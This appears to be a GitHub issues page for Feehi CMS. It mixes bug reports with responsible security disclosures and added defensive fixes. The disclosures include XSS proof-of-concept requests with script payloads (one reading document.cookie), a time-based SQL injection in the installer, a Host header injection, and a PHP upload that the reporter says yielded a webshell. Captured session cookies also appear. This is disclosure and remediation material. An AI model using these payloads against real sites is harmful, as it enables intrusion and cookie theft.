liufee / cms
Feehi CMS based on yii2
Home Page: http://demo.cms.feehi.com
License: Other
At present the UEditor upload URL is hard-coded, which makes it poorly reusable. I suggest passing it as a template parameter instead, so it is easier to customize or extend during secondary development.
Calling unknown method: feehi\web\Session::setCacheLimiter(). This error appears when opening an article page on the front end.
Problem 1:
Uploads produce a double "/" and the file cannot be accessed:
https://www.xxx.com**//**uploads/ueditor/upload/image/20200211/xxxx.png
Problem 2:
I am using a CDN, so I want to change the access domain. How can this be changed?
There is no yii in your topic tags; I suggest adding it.
1. Menu -> Frontend Menu -> edit page: the dropdown for the Parent Menu item shows the backend menu list.
2. Operations -> Ad Management -> after choosing ad type (txt), the following error appears:
htmlspecialchars() expects parameter 1 to be string, array given
Using a text-type or video-type ad in the front-end slider_right_2 ad slot also fails; the source does not check the ad type before rendering the corresponding output.
As the title says, please add a dropdown button group style.
public $format = ['datetime', 'php:Y-m-d H:m'];
should modify to
public $format = ['datetime', 'php:Y-m-d H:i:s'];
There is only "yii.bat" in the root directory, missing "yii". It is unfriendly to *nix developers.
For example, with articles, the delete button after each article does nothing, and the page stays in the deleting state without responding; but the delete button at the top works after selecting the articles. Why is that? Am I the only one with this problem?
Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
Warning: Cannot modify header information - headers already sent in Unknown on line 0
The anonymous function under the init method does not need $this passed in.
Not Found (#404)
Category "partners" not found
The server encountered the above error while processing your request
If you believe this is a server error, please let us know, thank you!
How can this error be fixed?
Hello, I found a Host Header Injection in FeehiCMS 2.1.1.
Description:
A Host Header Injection vulnerability in Feehi CMS 2.1.1 may allow an attacker to spoof a particular header. This can be exploited by abusing password reset emails.
PoC:
https://www.youtube.com/watch?v=k8dp0FJnSsI&ab_channel=IkariShinji
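The usual Yii2 mitigation for the report above is to stop deriving the host used in generated absolute URLs (such as the link in a password-reset mail) from the client-supplied Host header. The fragment below is an added example, not part of the Feehi CMS code base; it assumes it is merged into the application config (for instance common/config/main-local.php) and that https://cms.example.com is a placeholder for the real site domain.

```php
<?php
// Added example (not Feehi CMS code): pin the host name Yii2 uses when it builds
// absolute URLs, so the value no longer comes from the request's Host header.
// Assumed: https://cms.example.com is a placeholder for the deployed domain.
return [
    'components' => [
        'request' => [
            // yii\web\Request::$hostInfo: overrides the scheme and host parsed
            // from the incoming request for everything that asks the request component.
            'hostInfo' => 'https://cms.example.com',
        ],
        'urlManager' => [
            // yii\web\UrlManager::$hostInfo: used by Url::to()/createAbsoluteUrl(),
            // which is what mail templates typically call to build reset links.
            'hostInfo' => 'https://cms.example.com',
        ],
    ],
];
```

The web server should additionally refuse requests whose Host header does not match a configured server name (a catch-all default server in nginx, or a matching ServerName in Apache), so the application never receives an unexpected host in the first place.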
This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or other JS code, the pop-up alert is triggered when browsing the post. Details are as follows:
POC example:
registered:
POST /index.php?r=site%2Fsignup HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 283
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317
Connection: close
_csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=
login:
POST /index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 296
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432
Connection: close
_csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
When uploading images with the Baidu editor (UEditor) in the backend, animated GIF images cannot be selected; JPG images can.
When an array is stored into a JSON field, an error about string versus array format is reported.
There are many similar problems: the variables submitted or modified through forms are often arrays, and logging then fails.
Also, a few files use an uppercase first letter in their namespace, so the files cannot be found on Linux.
Overall the program is very well done and saves a lot of development time. Keep it up!
'mailer' => [
    'class' => yii\swiftmailer\Mailer::className(),
    'viewPath' => '@common/mail',
    'useFileTransport' => false, // false sends the mail; true only writes the mail under the runtime folder without sending
    'transport' => [
        'class' => 'Swift_SmtpTransport',
        'host' => ' smtp.163.com', // the host setting differs for each mail provider
        'username' => '[email protected]',
        'password' => 'xxxxx',
        'port' => '25',
        'encryption' => 'tls',
    ],
    'messageConfig' => [
        'charset' => 'UTF-8',
        'from' => ['[email protected]' => 'Feehi CMS']
    ],
],
common/config/main-local.php
No. How should this be handled?
The cause is the same as #46 and it can be fixed the same way.
public function beforeValidate()
{
    // Only replace the attribute with the uploaded file when the form actually sent one;
    // "0" is the placeholder value meaning "no new file".
    if ($this->ad !== "0") {
        $this->ad = UploadedFile::getInstance($this, "ad");
    }
    return parent::beforeValidate();
}
How do I change the save path of the administrator avatar image? I searched for a long time and could not find it.
After installing from the archive file, visiting the signup or login page gives a jQuery error: index.php?r=site%2Flogin:1574 Uncaught TypeError: jQuery(...).yiiActiveForm is not a function
at HTMLDocument. (index.php?r=site%2Flogin:1574)
at l (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at Function.ready (jquery.min.js:2)
at HTMLDocument.A (jquery.min.js:2)
GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
Due to the lax filtering of the tag parameter, JS code can be inserted to cause cross-site scripting attacks. If the tag parameter is assigned "<script>alert(123)</script>" and submitted via GET, a cross-site scripting attack results.
The exploit code is as follows:
http://127.0.0.1/index.php?r=search%2Ftag&tag=<script>alert(123)</script>
First of all, I think the author's idea is very good. Based on a framework, I have tried many times before, from the early ioize to today's Laravel October, always looking for a good CMS. Feehi gives me hope. Thanks to the author.
I suggest integrating layerUI 2 and adding a download model, ad slot management and so on to the backend.
Hey there!
I belong to an open source security research community, and a member (@0xAmal) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Hi, I found a cross site scripting vulnerability in Feehi CMS via image upload.
POC:
please add rtl support for admin panel. thanks.
During the early stage of installation, the database name is not filtered, leading to SQL injection.
Taking one place as an example:
install\controllers\SiteController.php, line 315
$dbname is not restricted in any way:
$db->createCommand("use $dbname")->execute(); // check whether the username and password are correct
$this->checkAccountPermission($db, $dbname);
Intercepting with Burp and executing sleep for comparison:
sleep   response time
1       3087m
5       15030m
10      30009m
As shown in the figure below.
Fix
Restrict the variable $dbname, or change how the SQL is executed.
Three lines need to be restricted:
315
425
437
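A database name is an identifier, so it cannot be bound as a prepared-statement parameter; the fix the report asks for is an allowlist check on $dbname plus identifier quoting before it is concatenated into the USE statement. The following is an added example and not the project's code; the function names and the constructed inputs are assumptions.

```php
<?php
// Added example, not Feehi CMS code: validate a user-supplied database name before it
// is placed in a "USE ..." statement. Function names and the inputs below are assumed.

function isSafeDatabaseName(string $name): bool
{
    // An installer only needs letters, digits and underscore (MySQL's 64-byte limit
    // applies). Rejecting everything else removes whitespace, quotes, semicolons and
    // comment markers, which is what a time-based probe needs to reach the server.
    return strlen($name) <= 64 && preg_match('/^[A-Za-z0-9_]+$/', $name) === 1;
}

function buildUseStatement(string $name): string
{
    if (!isSafeDatabaseName($name)) {
        throw new InvalidArgumentException('Invalid database name');
    }
    // Quote as a MySQL identifier. With the allowlist above no backtick can be present,
    // but doubling any backtick keeps the quoting correct if the allowlist is relaxed later.
    // In a Yii2 controller the equivalent call is $db->quoteTableName($name).
    return 'USE `' . str_replace('`', '``', $name) . '`';
}

// Constructed inputs: a legitimate name, one with a space, and one carrying a
// statement separator of the kind a sleep-based probe relies on.
$inputs = ['feehi_cms', 'feehi cms', 'feehi_cms;sleep(5)'];
foreach ($inputs as $input) {
    try {
        echo buildUseStatement($input), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', var_export($input, true), "\n";
    }
}
```

Applied to the three lines named in the report, the pattern is to run the allowlist check once when the form is validated and then build the statement as `$db->createCommand('USE ' . $db->quoteTableName($dbname))`, so the raw value never reaches string interpolation.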
PHP 7.1 reports that the non-static function checkPermission cannot be called in the backend on first init; once the function was changed to static, the problem was fixed.
In the backend, you can upload a PHP file by changing the image suffix to PHP, resulting in command execution.
url:http://192.168.18.143/admin/index.php?r=admin-user%2Fupdate-self
Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
Step To Reproduce:
Vulnerable cms URL: https://demo.cms.feehi.com/
Vulnerable Parameter: Comment_nickname:
1. Sign up at https://demo.cms.feehi.com/
2. Inject the XSS payload in Username: "><script>alert(232)</script>, fill in all required fields and click the SignUp button
3. Go to any article; the XSS will trigger.
Impact:
An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim, or for phishing attacks.
In the Docker CMS demo, the database name is written wrong and has to be changed inside. Also, the backend username and password are not published: admin 123456
This file does not seem to exist.
FeehiCMS 2.0.8.1-hotfix: an account registered on the front end can no longer be used the next day. What is the reason?
Package guzzle/guzzle is abandoned, you should avoid using it. Use guzzlehttp/guzzle instead.
This is a Cross Site Scripting vulnerability that appears in two places (frontend and backend). When lang is english"><script>alert(/xss/)</script>< or other JS code, the pop-up alert is triggered when browsing the Feehi post. Details are as follows:
POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or
http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>
View any post and xss pop-up:
Hi,
The tag parameter is vulnerable. It is possible to exploit an XSS vulnerability through the following request:
http://demo.cms.feehi.com/index.php?r=search/tag&tag=%3Cscript%3Ealert(document.cookie)%3C/script%3E
You can filter the parameters!!!
After Yii::$app->user->setReturnUrl(Url::current()); the subsequent return $this->goBack(); does not redirect to the corresponding controller path but instead to domain/assets/ebd9225d/jquery.js
There is an arbitrary file upload vulnerability in the background avatar upload.
The CMS only verifies the file suffix on the front end with JS, and we found that we could upload PHP scripts directly after capturing and modifying the request with Burp Suite.
The attacker can modify the boxed field in the picture and upload the PHP script directly; it also returns the upload path (in the red box on the right of the figure above).
When the PHP file content is a Trojan, attackers can get a shell directly.
Here I used Behinder as a shell management tool, and getshell successfully.
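The two avatar-upload reports above come down to the same gap: the only check runs in the browser. Below is an added example of the server-side validation a defender would put behind that form; it is not Feehi CMS code, and the function name, constant and constructed sample files are assumptions.

```php
<?php
// Added example, not Feehi CMS code: validate an uploaded avatar on the server rather
// than trusting the JavaScript extension check. The file must have an allowlisted
// extension, a MIME type detected from its bytes that matches that extension, and it
// must decode as an image; it is then stored under a server-chosen random name, so a
// client-supplied name such as "x.php" never reaches the web root.

const ALLOWED_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

// Returns the file name to store under, or null when the upload is rejected.
function validateAvatarUpload(string $tmpPath, string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if (!in_array($ext, ALLOWED_TYPES, true)) {
        return null; // extension is not in the allowlist
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($tmpPath);
    if (!isset(ALLOWED_TYPES[$mime]) || ALLOWED_TYPES[$mime] !== $ext) {
        return null; // the bytes do not match the claimed type
    }
    if (@getimagesize($tmpPath) === false) {
        return null; // not a decodable image
    }
    // The stored extension comes from the detected type, never from the client.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

// Constructed samples: a 1x1 PNG, and a PHP script submitted under two file names.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$pngPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($pngPath, $png);
$phpPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($phpPath, "<?php echo 'not an image';");

var_dump(validateAvatarUpload($pngPath, 'avatar.png')); // genuine PNG with matching extension
var_dump(validateAvatarUpload($phpPath, 'avatar.php')); // extension outside the allowlist
var_dump(validateAvatarUpload($phpPath, 'avatar.png')); // image extension, but script bytes
unlink($pngPath);
unlink($phpPath);
```

In a Yii2 model the same checks can be expressed with yii\validators\FileValidator (`extensions` together with its default `checkExtensionByMimeType`), and the upload directory should additionally be served with script execution disabled so that a validation regression cannot turn a file write into code execution.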
Hi, I found an XSS vulnerability in the Feehi CMS login form.
What is XSS?
An attacker can inject and execute JavaScript code in the web page.
Feehi CMS reflects your input data on the web page, like
So an attacker can inject JavaScript code into the web page using a form request.
POC Videos:
Note: the YouTube video is unlisted, so no one can see it except those who have the video link.
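The username, tag, lang and login-form reports on this page are all the same defect: a value supplied by the user is written into HTML without encoding for the context it lands in. The example below is added here and is not Feehi CMS code; it shows the three contexts those reports exercise (text node, attribute value, query-string value) each going through the encoder for that context. Function names and the constructed inputs are assumptions.

```php
<?php
// Added example, not Feehi CMS code: encode untrusted values for the HTML context they
// are rendered in, so a stored or reflected value stays data and is never parsed as
// markup. Function names and the inputs at the bottom are assumed for illustration.

// Text node or quoted attribute value. Yii2's Html::encode() performs this same call.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Query-string component: a reflected parameter that is echoed back inside a link.
function encodeUrlParam(string $value): string
{
    return rawurlencode($value);
}

// Render a search-by-tag page: the tag appears as text, as an attribute value and
// inside a link's query string. The href is URL-encoded first, then HTML-encoded,
// because the attribute context wraps the URL context.
function renderTagPage(string $tag): string
{
    $text = encodeHtml($tag);
    $href = encodeHtml('/index.php?r=search/tag&tag=' . encodeUrlParam($tag));
    return "<h1>Tag: {$text}</h1>\n"
         . "<input name=\"tag\" value=\"{$text}\">\n"
         . "<a href=\"{$href}\">permalink</a>\n";
}

// Constructed inputs shaped like the values in the reports: a plain tag, a script tag,
// and a value that tries to close the surrounding attribute.
foreach (['yii', '<script>alert(1)</script>', 'english"><b>x</b>'] as $input) {
    echo renderTagPage($input), "\n";
}
```

The htmlspecialchars() "array given" error reported earlier on this page is the same encoder meeting the wrong data type: values that may arrive as arrays (form fields submitted with [] names) need to be validated to a scalar before they reach the view, not silently cast.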
I previously submitted a bug saying it was a config file problem, but later found that the problem is in the backend file static/js/plugins/ueditor/dialogs/image/image.js. At around line 365 there is the following code:
accept: { title: 'Images', extensions: acceptExtensions, mimeTypes: 'image/jpg,image/jpeg,image/png' },
Only jpg, jpeg and png images are accepted for upload; after adding image/gif, local GIF images can be selected and uploaded.